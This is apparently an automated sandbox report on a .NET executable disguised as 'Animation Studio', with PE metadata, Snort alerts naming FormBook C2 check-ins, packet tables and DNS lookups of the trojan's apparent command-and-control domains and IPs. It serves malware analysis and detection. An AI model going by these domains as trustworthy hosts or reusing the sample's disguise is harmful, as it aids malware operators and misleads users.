                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x144c040x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1460000x61c.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1480000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x144acc0x1c.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x142c5c0x142e00False0.510306269357data5.95563041351IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x1460000x61c0x800False0.33251953125data3.45449332784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1480000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_VERSION0x1460900x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                          RT_MANIFEST0x14642c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyrightCopyright 2017 - 2021
                                                                                          Assembly Version1.0.0.0
                                                                                          InternalNameAppDomainTimerSafeHandle.exe
                                                                                          FileVersion1.0.0.0
                                                                                          CompanyName
                                                                                          LegalTrademarks
                                                                                          Comments
                                                                                          ProductNameAnimation Studio
                                                                                          ProductVersion1.0.0.0
                                                                                          FileDescriptionAnimation Studio
                                                                                          OriginalFilenameAppDomainTimerSafeHandle.exe

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          06/10/21-19:13:59.731450TCP1201ATTACK-RESPONSES 403 Forbidden804974523.227.38.74192.168.2.3
                                                                                          06/10/21-19:14:16.131239TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3199.195.117.147
                                                                                          06/10/21-19:14:16.131239TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3199.195.117.147
                                                                                          06/10/21-19:14:16.131239TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3199.195.117.147

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jun 10, 2021 19:13:31.940980911 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.136662006 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:32.137096882 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.137279034 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.336549997 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:32.336571932 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:32.336802959 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.336874008 CEST4973680192.168.2.3142.111.47.2
                                                                                          Jun 10, 2021 19:13:32.532706976 CEST8049736142.111.47.2192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.491502047 CEST4973780192.168.2.313.59.53.244
                                                                                          Jun 10, 2021 19:13:43.631710052 CEST804973713.59.53.244192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.632787943 CEST4973780192.168.2.313.59.53.244
                                                                                          Jun 10, 2021 19:13:43.632910013 CEST4973780192.168.2.313.59.53.244
                                                                                          Jun 10, 2021 19:13:43.773215055 CEST804973713.59.53.244192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.774286032 CEST804973713.59.53.244192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.774324894 CEST804973713.59.53.244192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.774629116 CEST4973780192.168.2.313.59.53.244
                                                                                          Jun 10, 2021 19:13:43.774801970 CEST4973780192.168.2.313.59.53.244
                                                                                          Jun 10, 2021 19:13:43.916323900 CEST804973713.59.53.244192.168.2.3
                                                                                          Jun 10, 2021 19:13:48.908981085 CEST4974280192.168.2.378.31.67.91
                                                                                          Jun 10, 2021 19:13:48.962181091 CEST804974278.31.67.91192.168.2.3
                                                                                          Jun 10, 2021 19:13:48.962362051 CEST4974280192.168.2.378.31.67.91
                                                                                          Jun 10, 2021 19:13:48.962518930 CEST4974280192.168.2.378.31.67.91
                                                                                          Jun 10, 2021 19:13:49.017914057 CEST804974278.31.67.91192.168.2.3
                                                                                          Jun 10, 2021 19:13:49.018184900 CEST804974278.31.67.91192.168.2.3
                                                                                          Jun 10, 2021 19:13:49.018228054 CEST804974278.31.67.91192.168.2.3
                                                                                          Jun 10, 2021 19:13:49.018381119 CEST4974280192.168.2.378.31.67.91
                                                                                          Jun 10, 2021 19:13:49.018410921 CEST4974280192.168.2.378.31.67.91
                                                                                          Jun 10, 2021 19:13:49.073561907 CEST804974278.31.67.91192.168.2.3
                                                                                          Jun 10, 2021 19:13:54.095321894 CEST4974380192.168.2.3184.168.131.241
                                                                                          Jun 10, 2021 19:13:54.288825035 CEST8049743184.168.131.241192.168.2.3
                                                                                          Jun 10, 2021 19:13:54.289026976 CEST4974380192.168.2.3184.168.131.241
                                                                                          Jun 10, 2021 19:13:54.289207935 CEST4974380192.168.2.3184.168.131.241
                                                                                          Jun 10, 2021 19:13:54.482517004 CEST8049743184.168.131.241192.168.2.3
                                                                                          Jun 10, 2021 19:13:54.504077911 CEST8049743184.168.131.241192.168.2.3
                                                                                          Jun 10, 2021 19:13:54.504118919 CEST8049743184.168.131.241192.168.2.3
                                                                                          Jun 10, 2021 19:13:54.504359007 CEST4974380192.168.2.3184.168.131.241
                                                                                          Jun 10, 2021 19:13:54.504501104 CEST4974380192.168.2.3184.168.131.241
                                                                                          Jun 10, 2021 19:13:54.699930906 CEST8049743184.168.131.241192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.596889019 CEST4974580192.168.2.323.227.38.74
                                                                                          Jun 10, 2021 19:13:59.639250040 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.639415026 CEST4974580192.168.2.323.227.38.74
                                                                                          Jun 10, 2021 19:13:59.639724970 CEST4974580192.168.2.323.227.38.74
                                                                                          Jun 10, 2021 19:13:59.681863070 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731450081 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731489897 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731511116 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731532097 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731551886 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731570005 CEST804974523.227.38.74192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.731688023 CEST4974580192.168.2.323.227.38.74
                                                                                          Jun 10, 2021 19:13:59.731762886 CEST4974580192.168.2.323.227.38.74
                                                                                          Jun 10, 2021 19:13:59.731870890 CEST4974580192.168.2.323.227.38.74
                                                                                          Jun 10, 2021 19:14:04.844986916 CEST4974680192.168.2.3212.32.237.92
                                                                                          Jun 10, 2021 19:14:04.895517111 CEST8049746212.32.237.92192.168.2.3
                                                                                          Jun 10, 2021 19:14:04.895966053 CEST4974680192.168.2.3212.32.237.92
                                                                                          Jun 10, 2021 19:14:04.896286964 CEST4974680192.168.2.3212.32.237.92
                                                                                          Jun 10, 2021 19:14:04.946882963 CEST8049746212.32.237.92192.168.2.3
                                                                                          Jun 10, 2021 19:14:04.973402023 CEST8049746212.32.237.92192.168.2.3
                                                                                          Jun 10, 2021 19:14:04.973594904 CEST4974680192.168.2.3212.32.237.92
                                                                                          Jun 10, 2021 19:14:05.386490107 CEST4974680192.168.2.3212.32.237.92
                                                                                          Jun 10, 2021 19:14:05.437103033 CEST8049746212.32.237.92192.168.2.3
                                                                                          Jun 10, 2021 19:14:05.727042913 CEST8049746212.32.237.92192.168.2.3
                                                                                          Jun 10, 2021 19:14:05.727185011 CEST4974680192.168.2.3212.32.237.92
                                                                                          Jun 10, 2021 19:14:15.977945089 CEST4974980192.168.2.3199.195.117.147
                                                                                          Jun 10, 2021 19:14:16.130170107 CEST8049749199.195.117.147192.168.2.3
                                                                                          Jun 10, 2021 19:14:16.131011963 CEST4974980192.168.2.3199.195.117.147
                                                                                          Jun 10, 2021 19:14:16.131238937 CEST4974980192.168.2.3199.195.117.147
                                                                                          Jun 10, 2021 19:14:16.283220053 CEST8049749199.195.117.147192.168.2.3
                                                                                          Jun 10, 2021 19:14:16.283550024 CEST8049749199.195.117.147192.168.2.3
                                                                                          Jun 10, 2021 19:14:16.283670902 CEST8049749199.195.117.147192.168.2.3
                                                                                          Jun 10, 2021 19:14:16.283907890 CEST4974980192.168.2.3199.195.117.147
                                                                                          Jun 10, 2021 19:14:16.283993006 CEST4974980192.168.2.3199.195.117.147
                                                                                          Jun 10, 2021 19:14:16.435827971 CEST8049749199.195.117.147192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.400363922 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.535219908 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.535461903 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.535777092 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.678721905 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678759098 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678775072 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678787947 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678805113 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678822041 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678838015 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678853989 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678869963 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678889990 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.678972006 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.679013014 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.813819885 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813864946 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813877106 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813894033 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813910961 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813930035 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813947916 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813965082 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813982010 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.813994884 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.814007044 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.814013958 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.814033031 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.814047098 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.814060926 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.814177990 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.814285994 CEST4975180192.168.2.354.85.86.211
                                                                                          Jun 10, 2021 19:14:21.952429056 CEST804975154.85.86.211192.168.2.3
                                                                                          Jun 10, 2021 19:14:27.127269030 CEST4975280192.168.2.323.82.57.32
                                                                                          Jun 10, 2021 19:14:27.321831942 CEST804975223.82.57.32192.168.2.3
                                                                                          Jun 10, 2021 19:14:27.321980000 CEST4975280192.168.2.323.82.57.32
                                                                                          Jun 10, 2021 19:14:27.322182894 CEST4975280192.168.2.323.82.57.32
                                                                                          Jun 10, 2021 19:14:27.516666889 CEST804975223.82.57.32192.168.2.3
                                                                                          Jun 10, 2021 19:14:27.911179066 CEST804975223.82.57.32192.168.2.3
                                                                                          Jun 10, 2021 19:14:27.911386013 CEST4975280192.168.2.323.82.57.32
                                                                                          Jun 10, 2021 19:14:28.333404064 CEST4975280192.168.2.323.82.57.32
                                                                                          Jun 10, 2021 19:14:28.527981997 CEST804975223.82.57.32192.168.2.3
                                                                                          Jun 10, 2021 19:14:29.504343033 CEST804975223.82.57.32192.168.2.3
                                                                                          Jun 10, 2021 19:14:29.504457951 CEST4975280192.168.2.323.82.57.32

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jun 10, 2021 19:12:18.210840940 CEST5754453192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:18.260965109 CEST53575448.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:18.461781025 CEST5598453192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:18.523755074 CEST53559848.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:19.053366899 CEST6418553192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:19.103351116 CEST53641858.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:19.868129969 CEST6511053192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:19.921014071 CEST53651108.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:22.068025112 CEST5836153192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:22.118015051 CEST53583618.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:23.584527969 CEST6349253192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:23.637872934 CEST53634928.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:24.479895115 CEST6083153192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:24.533118963 CEST53608318.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:25.641288996 CEST6010053192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:25.694478989 CEST53601008.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:26.520952940 CEST5319553192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:26.579555988 CEST53531958.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:27.431710958 CEST5014153192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:27.484085083 CEST53501418.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:29.024600029 CEST5302353192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:29.075109959 CEST53530238.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:29.779786110 CEST4956353192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:29.830183983 CEST53495638.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:31.320354939 CEST5135253192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:31.378803015 CEST53513528.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:32.130673885 CEST5934953192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:32.189801931 CEST53593498.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:33.040491104 CEST5708453192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:33.098870039 CEST53570848.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:33.947945118 CEST5882353192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:33.998049974 CEST53588238.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:34.930814028 CEST5756853192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:34.982114077 CEST53575688.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:35.902683973 CEST5054053192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:35.955640078 CEST53505408.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:52.177289009 CEST5436653192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:52.252533913 CEST53543668.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:12:55.636603117 CEST5303453192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:12:55.698474884 CEST53530348.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:12.998548031 CEST5776253192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:13.060714960 CEST53577628.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:13.794930935 CEST5543553192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:13.853888988 CEST53554358.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:31.702744961 CEST5071353192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:31.933248043 CEST53507138.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:37.738403082 CEST5613253192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:38.280256033 CEST53561328.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:43.325025082 CEST5898753192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:43.488770962 CEST53589878.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:48.708630085 CEST5657953192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:48.768743992 CEST53565798.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:48.830652952 CEST6063353192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:48.907670975 CEST53606338.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:54.030746937 CEST6129253192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:54.093816996 CEST53612928.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:56.146281004 CEST6361953192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:56.223470926 CEST53636198.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:13:59.521514893 CEST6493853192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:13:59.594762087 CEST53649388.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:04.769876957 CEST6194653192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:04.839838028 CEST53619468.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:05.126753092 CEST6491053192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:05.199338913 CEST53649108.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:05.605135918 CEST5212353192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:05.675189972 CEST53521238.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:10.406912088 CEST5613053192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:10.801793098 CEST53561308.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:15.813658953 CEST5633853192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:15.976633072 CEST53563388.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:17.727833986 CEST5942053192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:17.789539099 CEST53594208.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:21.323467016 CEST5878453192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:21.398601055 CEST53587848.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:27.046459913 CEST6397853192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:27.123611927 CEST53639788.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:33.347067118 CEST6293853192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST53629388.8.8.8192.168.2.3
                                                                                          Jun 10, 2021 19:14:38.812021971 CEST5570853192.168.2.38.8.8.8
                                                                                          Jun 10, 2021 19:14:38.875571966 CEST53557088.8.8.8192.168.2.3

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Jun 10, 2021 19:13:31.702744961 CEST192.168.2.38.8.8.80xf9f3Standard query (0)www.yunlimall.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:37.738403082 CEST192.168.2.38.8.8.80x7141Standard query (0)www.kce0728com.netA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:43.325025082 CEST192.168.2.38.8.8.80xbbc4Standard query (0)www.painhut.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:48.830652952 CEST192.168.2.38.8.8.80xa8fStandard query (0)www.cleanxcare.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:54.030746937 CEST192.168.2.38.8.8.80x431bStandard query (0)www.thriveglucose.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:59.521514893 CEST192.168.2.38.8.8.80xc60eStandard query (0)www.essentiallyourscandles.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:04.769876957 CEST192.168.2.38.8.8.80x2aa8Standard query (0)www.ololmychartlogin.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:10.406912088 CEST192.168.2.38.8.8.80x938fStandard query (0)www.advancedaccessapplications.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:15.813658953 CEST192.168.2.38.8.8.80xa564Standard query (0)www.swayam-moj.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:21.323467016 CEST192.168.2.38.8.8.80x63f9Standard query (0)www.brunoecatarina.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:27.046459913 CEST192.168.2.38.8.8.80x1c4bStandard query (0)www.ruhexuangou.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.347067118 CEST192.168.2.38.8.8.80xb54cStandard query (0)www.boogerstv.comA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:38.812021971 CEST192.168.2.38.8.8.80x8d55Standard query (0)www.totally-seo.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Jun 10, 2021 19:13:31.933248043 CEST8.8.8.8192.168.2.30xf9f3No error (0)www.yunlimall.com142.111.47.2A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:38.280256033 CEST8.8.8.8192.168.2.30x7141Server failure (2)www.kce0728com.netnonenoneA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:43.488770962 CEST8.8.8.8192.168.2.30xbbc4No error (0)www.painhut.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:43.488770962 CEST8.8.8.8192.168.2.30xbbc4No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com13.59.53.244A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:43.488770962 CEST8.8.8.8192.168.2.30xbbc4No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.143.65.214A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:43.488770962 CEST8.8.8.8192.168.2.30xbbc4No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.14.32.15A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:48.907670975 CEST8.8.8.8192.168.2.30xa8fNo error (0)www.cleanxcare.comcleanxcare.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:48.907670975 CEST8.8.8.8192.168.2.30xa8fNo error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:54.093816996 CEST8.8.8.8192.168.2.30x431bNo error (0)www.thriveglucose.comthriveglucose.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:54.093816996 CEST8.8.8.8192.168.2.30x431bNo error (0)thriveglucose.com184.168.131.241A (IP address)IN (0x0001)
